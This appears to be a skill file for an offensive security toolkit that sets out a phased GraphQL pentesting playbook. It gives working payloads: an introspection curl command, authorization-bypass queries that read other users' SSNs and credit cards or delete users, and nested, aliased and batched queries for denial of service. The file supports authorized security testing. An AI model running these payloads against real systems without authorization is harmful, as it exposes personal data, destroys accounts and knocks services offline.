| name | attack-graphql |
| description | GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["graphql","api","web","dos","attack"] |
| tech_stack | ["web","graphql"] |
| cwe_ids | ["CWE-200","CWE-284","CWE-770"] |
| chains_with | ["attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-idor-automation":"GraphQL introspection reveals IDOR-vulnerable queries"} |
GraphQL Vulnerability Testing
Objective
Exploit GraphQL-specific vulnerabilities including schema exposure, query complexity abuse, and authorization bypass.
Testing Methodology
Phase 1: Automated Testing
attack_script graphql_tester "https://TARGET/graphql" \
-H "Authorization:Bearer TOKEN" \
--json-output
attack_script graphql_tester "https://TARGET/graphql" \
--depth 15 --batch-count 100
Phase 2: Introspection Query
curl -s -X POST https://TARGET/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name fields { name type { name } } } mutationType { fields { name args { name type { name } } } } queryType { fields { name } } } }"}'
If introspection is enabled, map all types, queries, mutations, and subscriptions.
Phase 3: Authorization Bypass
{ adminUsers { id email role } }
mutation { deleteUser(id: "123") { success } }
{ user(id: "OTHER_USER_ID") { email ssn creditCard } }
Phase 4: Complexity / DoS
{ users { posts { comments { author { posts { comments { author { id } } } } } } } }
{ a1: __typename a2: __typename ... a100: __typename }
[{"query":"{ __typename }"}, {"query":"{ __typename }"}, ... x50]
Phase 5: Directive Abuse
{ user(id: "1") { name email @skip(if: false) secretField @include(if: true) } }
{ user { nonExistentField } }
What Constitutes a Finding
| Finding | Severity |
|---|
| Introspection enabled (schema exposed) | Medium (P3) |
| Admin mutations accessible without auth | Critical (P1) |
| Other user data accessible (IDOR) | High (P2) |
| DoS via complexity (server timeout/crash) | Medium (P3) |
| Batch queries bypass rate limiting | Medium (P3) |
Evidence Requirements
- GraphQL endpoint URL
- Query/mutation sent
- Response showing unauthorized data
- For introspection: schema dump (types, mutations, queries)
- For DoS: response timing proving server overload
Tools
attack_script graphql_tester — automated introspection + DoS + batch testing
References